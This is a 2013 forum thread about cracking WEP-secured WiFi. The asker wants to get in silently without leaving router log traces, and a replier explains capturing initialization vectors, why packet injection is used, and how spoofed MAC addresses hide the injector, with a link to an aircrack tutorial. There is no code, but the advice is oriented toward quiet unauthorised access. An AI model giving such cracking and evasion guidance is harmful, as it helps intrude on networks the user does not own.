Hi all,
Just a quick question. I'm trying to work out whether it's possible to get into a WEP secured WiFi network purely by packet sniffing. I've found loads of tutorials showing how to do it with BackTrack a bit of packet injection, but I'm wondering if you can do it without making a noise?
I was once told that WEP is such a bad idea because at some point the key is transmitted over the network unencrypted, is this true? If so, why can't I find a way to just sniff and read the right packets?
Thanks.
0
Wep Network Key
Started by Staneslevski, Feb 08 2013 16:29
5 replies to this topic
#2
-
- Premium Members
-
- 327 posts
Guru
Posted 08 February 2013 - 18:42
It's possible to crack it with passive sniffing, however it'll take a lot of time. The vulnerability in WEP lies in the packets transferred between the client and the Access Point during authentication. What you see in the tutorials where they inject packets, it's done to deauthenticate the client from the AP, forcing them to reconnect and re-transmit the authentication steps over and over again, allowing you to capture the required number of IVs (packets containing the Initialization vector, the vulnerable part in WEP). So you can passively sniff the network for IVs, but you'll have to capture natural connections between clients and the AP - which can take a long time.
You'll need around 50.000 to 100.000 IVs to quickly crack the WEP. Less can do it - just takes longer time to bruteforce.
[EDIT] Just read up on some theory. It's not in the authentication that the IVs are transmitted, but in general traffic. And the packets injections aren't to deauth the client fromt he AP; but rather to just create traffic to "lure out" more packets with weak IVs.
I think I confused some WPA cracking with WEP...
A good read on WEP cracking: http://www.aircrack-...imple_wep_crack
You'll need around 50.000 to 100.000 IVs to quickly crack the WEP. Less can do it - just takes longer time to bruteforce.
[EDIT] Just read up on some theory. It's not in the authentication that the IVs are transmitted, but in general traffic. And the packets injections aren't to deauth the client fromt he AP; but rather to just create traffic to "lure out" more packets with weak IVs.
I think I confused some WPA cracking with WEP...
A good read on WEP cracking: http://www.aircrack-...imple_wep_crack
Edited by Lameth, 08 February 2013 - 18:53.
~Lameth
#3
-
- Members
-
- 3 posts
Newcomer
Posted 12 February 2013 - 10:10
Thanks for that, I'll do some more reading. I'm just wary as wouldn't packet injection cause identifying information to get left on the log files of the router?
Cheers. S
Cheers. S
#4
-
- Premium Members
-
- 327 posts
Guru
Posted 12 February 2013 - 14:35
If the router logs that kind of traffic (usually, they only log administrator logon and sometimes client authentication) it wouldn't be traceable back to you, as the packet injections would only work if they spoof the source MAC address. The MAC address will have to be a already authenticated party, otherwise the router will ignore it. So with the packet injections, the router will see it as comming from the other client, and not you. A logfile with a huge loads of suspecious traffic is an indication that something is happening, and with some specialized tools, it could be possible to track you down while you were activily injecting packets.
~Lameth
#5
-
- Members
-
- 3 posts
Newcomer
Posted 12 February 2013 - 22:03
I see. Much obliged for the info. Also, the 'specialised tools' you speak of are seriously cool. If I had money to burn that would definitely be my favourite toy. Cheers.
#6
-
- Premium Members
-
- 327 posts
Guru
Posted 13 February 2013 - 21:05
Aye. A colleague of mine is trying to convince our boss that we as an IT department can't live without it 
~Lameth
